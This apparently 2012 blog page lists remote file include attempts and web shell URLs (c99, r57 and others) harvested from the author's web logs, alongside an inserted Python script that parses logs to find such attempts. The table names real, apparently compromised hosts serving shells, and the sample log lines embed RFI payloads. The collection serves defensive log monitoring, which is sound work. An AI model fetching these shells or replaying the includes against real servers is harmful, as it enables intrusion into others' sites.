Web Shells and RFIs Collection

I wrote a little script to periodically look through my web logs for unique RFIs and Web Shells, and then collect them on one page where I can go look at them or download them to add to my Web Shell library. Many of these attacks are repeated multiple times, so I ignore the time fields when judging whether an RFI/Web Shell is unique. I've coded it to weed out links to Web Shells that 404. I also use nofollow and a referrer-hiding service so it does not look like I'm attacking anyone with the web shells (but the check for 404 sort of looks suspicious). This page will also let you link off to firebwall.com, where you can use their PHP decoder to look at the obfuscated code. Enjoy my Web Shell zoo; it should update itself every hour or so. If you see your domain on the list of websites hosting Web Shells, you are likely pwned and should clean up your server.
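The log-mining approach described above, as an added example that is not the author's script: it parses Apache/nginx combined-format log lines (an assumption about the log format), pulls out query-string values that are absolute remote URLs (the signature of an RFI attempt), and keys uniqueness on attacker IP, included URL, User-Agent and Referer while ignoring the timestamp, exactly as the paragraph describes. The "more likely web shell" filter is my own assumed heuristic (the page does not define its filter): the listed shells are all hosted as .txt. The sample log lines are constructed with RFC 5737 test addresses and .example hostnames. The 404 liveness check and the hourly refresh are left out.

```python
import re
from datetime import datetime
from urllib.parse import urlparse, parse_qsl

# Apache/nginx "combined" LogFormat (assumed; adjust the regex if yours differs).
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<request>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<agent>[^"]*)"'
)

# A query-string value that is itself an absolute URL is the signature of a
# remote file include attempt: the caller wants include()/require() to fetch a
# remote file instead of a local one.
REMOTE_URL_RE = re.compile(r'^(?:https?|ftp)://', re.IGNORECASE)

# Constructed sample log lines (RFC 5737 addresses, ".example" hosts). The first
# two differ only in their timestamps and must collapse into a single entry.
SAMPLE_LOG = [
    '203.0.113.7 - - [24/Dec/2012:19:47:31 -0800] "GET /index.php?page=http://shell-host.example/chupa.txt? HTTP/1.1" 200 512 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"',
    '203.0.113.7 - - [24/Dec/2012:21:02:10 -0800] "GET /index.php?page=http://shell-host.example/chupa.txt? HTTP/1.1" 200 512 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"',
    '198.51.100.9 - - [25/Dec/2012:01:16:04 -0800] "GET /wp-content/plugins/foo.php?f=http://other.example/r57.txt?? HTTP/1.1" 404 0 "-" "-"',
    '198.51.100.9 - - [25/Dec/2012:02:00:00 -0800] "GET /about.html HTTP/1.1" 200 2048 "http://example.invalid/" "Mozilla/5.0"',
    '192.0.2.5 - - [25/Dec/2012:03:00:00 -0800] "GET /view.php?id=12&cb=ftp://files.example/notes.php HTTP/1.1" 200 100 "-" "curl/7.26"',
]


def parse_line(line):
    """Split one combined-format log line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def extract_rfi_urls(request):
    """Return every query-string name or value of `request` that is an absolute remote URL.

    The trailing '?' or '??' seen on most collected URLs is kept on purpose: it
    distinguishes otherwise identical entries in the zoo.
    """
    query = urlparse(request).query
    found = []
    for name, value in parse_qsl(query, keep_blank_values=True):
        for candidate in (name, value):
            if REMOTE_URL_RE.match(candidate):
                found.append(candidate)
    return found


def collect_unique_rfis(log_lines):
    """Map (ip, url, agent, referer) -> first-seen time.

    The timestamp is deliberately left out of the key so that repeated attempts
    of the same include from the same source count once.
    """
    seen = {}
    for line in log_lines:
        rec = parse_line(line)
        if rec is None:
            continue
        for url in extract_rfi_urls(rec["request"]):
            key = (rec["ip"], url, rec["agent"], rec["referer"])
            seen.setdefault(key, rec["time"])
    return seen


def likely_webshell(url):
    """Assumed heuristic: shells are hosted as .txt so the hosting server hands
    back the PHP source instead of executing it."""
    return urlparse(url.rstrip("?")).path.lower().endswith(".txt")


def likely_shell_rows(log_lines):
    """Unique RFI attempts that pass the .txt heuristic, newest first."""
    rows = [
        {"ip": ip, "url": url, "agent": agent, "referer": referer, "time": first_seen}
        for (ip, url, agent, referer), first_seen in collect_unique_rfis(log_lines).items()
        if likely_webshell(url)
    ]
    rows.sort(key=lambda r: datetime.strptime(r["time"], "%d/%b/%Y:%H:%M:%S %z"), reverse=True)
    return rows


if __name__ == "__main__":
    print("Attacker | Request | Agent | Referer | Time")
    for r in likely_shell_rows(SAMPLE_LOG):
        print(f'{r["ip"]} | {r["url"]} | {r["agent"]} | {r["referer"]} | {r["time"]}')
```

Run it against a real access log by replacing SAMPLE_LOG with the file's lines. Keying on the User-Agent and Referer as well as IP and URL mirrors the page's table columns; if you only care about which shells are being pushed at you, shrink the key to the URL alone.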
Filtered for more likely Webshell RFIs
Attacker | Whois IP | Request | View on PHP Decoder | Agent | Referer | Time
--- | --- | --- | --- | --- | --- | ---
187.40.82.13 | Whois | http://www.amerint.com.br/plugins/system/chupa.txt? | View on PHP Decoder | Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) | - | 24/Dec/2012:19:47:31 -0800
187.40.81.59 | Whois | http://www.goodigood.com/mcharge/php/class//ekta.txt? | View on PHP Decoder | - | - | 20/Dec/2012:13:48:06 -0800
186.249.211.224 | Whois | http://www.goodigood.com/mcharge/php/class//dek.txt? | View on PHP Decoder | - | - | 20/Dec/2012:01:16:04 -0800
189.90.43.3 | Whois | http://www.qualityom.com.br/plugins/system/ip.txt? | View on PHP Decoder | Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) | - | 18/Dec/2012:12:17:48 -0800
187.58.105.54 | Whois | http://c99.gen.tr/c99.txt? | View on PHP Decoder | Mozilla/5.0 (Windows NT 5.1; rv:8.0.1) Gecko/20100101 Firefox/8.0.1 | - | 17/Dec/2012:13:26:10 -0800
187.40.106.182 | Whois | http://www.luvex.com.br/teste/riko.txt? | View on PHP Decoder | Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) | - | 16/Dec/2012:20:34:42 -0800
200.98.143.17 | Whois | http://www.goodigood.com/mainfiles/teste.txt? | View on PHP Decoder | - | - | 14/Dec/2012:16:12:49 -0800
189.72.209.60 | Whois | http://casamarvera10.cwahi.net/tester.txt?? | View on PHP Decoder | Mozilla/3.0 (compatible; Indy Library) | - | 13/Dec/2012:13:57:09 -0800
200.98.143.17 | Whois | http://www.goodigood.com/mainfiles/inside.txt? | View on PHP Decoder | - | - | 13/Dec/2012:04:38:05 -0800
81.177.22.64 | Whois | http://adamhomes.co.uk/scripts/id1.txt? | View on PHP Decoder | Mozilla/5.0 | - | 13/Dec/2012:01:15:11 -0800
118.97.95.231 | Whois | http://ijencrew.wapsite.me/bnc.ichat.txt?? | View on PHP Decoder | Mozilla/5.0 (Windows NT 5.1; rv:17.0) Gecko/20100101 Firefox/17.0 | - | 11/Dec/2012:09:04:35 -0800
190.188.186.123 | Whois | http://mobile.asnieres-sur-seine.fr/data/hjkjyuf43.txt? | View on PHP Decoder | Mozilla/3.0 (compatible; Indy Library) | - | 09/Dec/2012:17:21:14 -0800
187.40.111.9 | Whois | http://www.khonkaenrongyen.com/plugins/cmd2.txt? | View on PHP Decoder | Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) | - | 06/Dec/2012:20:58:26 -0800
187.40.103.247 | Whois | http://www.jcestetica.com.br/plugins/system/r57.txt?? | View on PHP Decoder | Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) | - | 06/Dec/2012:06:38:05 -0800
111.68.215.186 | Whois | http://www.sungeundongsan.org/zb/id.txt? | View on PHP Decoder | libwww-perl/5.805 | - | 05/Dec/2012:21:35:42 -0800
200.98.129.248 | Whois | http://www.ideocondo.com/php/new/flood/Scripts/g.txt? | View on PHP Decoder | Mozilla/3.0 (compatible; Indy Library) | - | 03/Dec/2012:18:45:35 -0800
200.98.164.226 | Whois | http://swiatodziezy.com/libraries/inside.txt? | View on PHP Decoder | Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) | - | 02/Dec/2012:10:11:41 -0800
177.6.107.193 | Whois | http://www.kini-kini.com/ancien_kini/optms.txt? | View on PHP Decoder | Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) | - | 29/Nov/2012:03:43:41 -0800
5.39.9.95 | Whois | http://www.dunkerquepromotion.org/images/temoignages/danger.txt?? | View on PHP Decoder | Mozilla/5.0 (Windows NT 6.1; WOW64; rv:13.0) Gecko/20100101 Firefox/13.0.1 | - | 27/Nov/2012:16:21:38 -0800
111.119.184.52 | Whois | http://c99.gen.tr/c99.txt | View on PHP Decoder | Mozilla/5.0 (Windows NT 5.1; rv:15.0) Gecko/20100101 Firefox/15.0 | - | 26/Nov/2012:22:24:24 -0800
200.98.140.97 | Whois | http://www.ntempreco.com/teste.txt?? | View on PHP Decoder | Mozilla/3.0 (compatible; Indy Library) | - | 26/Nov/2012:16:29:14 -0800
200.98.129.118 | Whois | http://www.asiandogs.ru/dog/id1.txt?? | View on PHP Decoder | Mozilla/5.0 | - | 24/Nov/2012:16:48:24 -0800
189.73.212.194 | Whois | http://galaxiauniversal.com/css/optms.txt? | View on PHP Decoder | Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) | - | 24/Nov/2012:03:09:29 -0800
187.40.94.178 | Whois | http://www.jcestetica.com.br/plugins/system/r57.txt? | View on PHP Decoder | Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) | - | 20/Nov/2012:12:21:40 -0800
176.254.215.142 | Whois | http://www.drivehq.com/web/v3nd3tta/shells/c99.txt? | View on PHP Decoder | Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0 | - | 18/Nov/2012:15:45:22 -0800
177.25.109.82 | Whois | http://egyptinsideout.com/plugins/system/nnframework/images/tester.txt? | View on PHP Decoder | Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) | - | 17/Nov/2012:04:26:40 -0800
189.74.19.227 | Whois | http://pc.eromil.com/goza.txt? | View on PHP Decoder | Mozilla/3.0 (compatible; Indy Library) | - | 16/Nov/2012:15:47:09 -0800
200.98.171.238 | Whois | http://acesso9583.hut4.ru/tester.txt? | View on PHP Decoder | - | - | 14/Nov/2012:16:43:05 -0800
201.15.114.66 | Whois | http://www.buy-nippon-motors.com/com/js/swfobject/optms.txt | View on PHP Decoder | Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) | - | 14/Nov/2012:14:58:25 -0800
187.90.77.194 | Whois | http://www.xambre.pr.gov.br/plugins/system/tester.txt? | View on PHP Decoder | Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) | - | 14/Nov/2012:08:46:22 -0800
189.48.124.171 | Whois | http://egyptinsideout.com/plugins/system//tooltips/images/tester.txt? | View on PHP Decoder | Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) | - | 14/Nov/2012:06:18:24 -0800
189.1.174.192 | Whois | http://www.wushu.org.ge/e107_images/david.txt | View on PHP Decoder | Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.8pre) Gecko/20070928 Firefox/2.0.0.7 Navigator/9.0RC1 | - | 13/Nov/2012:17:23:57 -0800
201.24.16.247 | Whois | http://produtosmaster.com/sonaberadinha.txt? | View on PHP Decoder | Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) | - | 09/Nov/2012:04:25:14 -0800
189.73.213.247 | Whois | http://produtosmaster.com/sonaberadinha.txt | View on PHP Decoder | Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) | - | 08/Nov/2012:10:35:59 -0800
5.39.9.95 | Whois | http://swjzaleze.ovh.org/swietlica_15/danger.txt?? | View on PHP Decoder | Mozilla/5.0 (Windows NT 6.1; WOW64; rv:13.0) Gecko/20100101 Firefox/13.0.1 | - | 04/Nov/2012:08:49:21 -0800
49.156.155.246 | Whois | http://ead-aerospace.com/Intranet/Dossiers/Customers/2/c99.txt | View on PHP Decoder | Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4 | - | 01/Nov/2012:07:32:59 -0700
72.55.132.168 | Whois | http://jamina.vacau.com/e107_admin/raw.txt?? | View on PHP Decoder | Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511 | - | 26/Oct/2012:20:12:31 -0700
64.20.38.154 | Whois | http://c99.gen.tr/r57.txt?&security/changemac | View on PHP Decoder | Snoopy v1.2.4 | - | 24/Oct/2012:11:12:35 -0700
64.20.38.154 | Whois | http://c99.gen.tr/r57.txt?&security/windows-forensics-registry-and-file-system-spots | View on PHP Decoder | Snoopy v1.2.4 | - | 24/Oct/2012:11:09:59 -0700
64.20.38.154 | Whois | http://c99.gen.tr/r57.txt?&security/networkprinterhacking | View on PHP Decoder | Snoopy v1.2.4 | - | 24/Oct/2012:10:35:49 -0700
177.0.49.124 | Whois | http://www.jkchemicals.in/wp-content/themes/Chameleon/cache/shell.txt | View on PHP Decoder | Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) | - | 20/Oct/2012:18:22:20 -0700
186.247.205.162 | Whois | http://www.acfinance.com.br/tool.txt? | View on PHP Decoder | Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) | - | 18/Oct/2012:09:45:34 -0700
200.98.164.62 | Whois | http://c99.gen.tr/c99.txt?? | View on PHP Decoder | Mozilla/3.0 (compatible; Indy Library) | - | 17/Oct/2012:16:42:06 -0700
217.71.106.39 | Whois | http://www.avidsen.com/2009/danger.txt???? | View on PHP Decoder | Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 | - | 17/Oct/2012:05:41:12 -0700
63.143.40.27 | Whois | http://www.nysnagard.no/mail.txt? | View on PHP Decoder | Mozilla/3.0 (compatible; Indy Library) | - | 04/Oct/2012:08:25:27 -0700
187.40.106.157 | Whois | http://www.akakaslogistics.com/manolo.txt? | View on PHP Decoder | Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) | - | 02/Oct/2012:22:20:27 -0700
Reviewed by Kembolle Amilkar on Monday, December 31, 2012. Rating: 5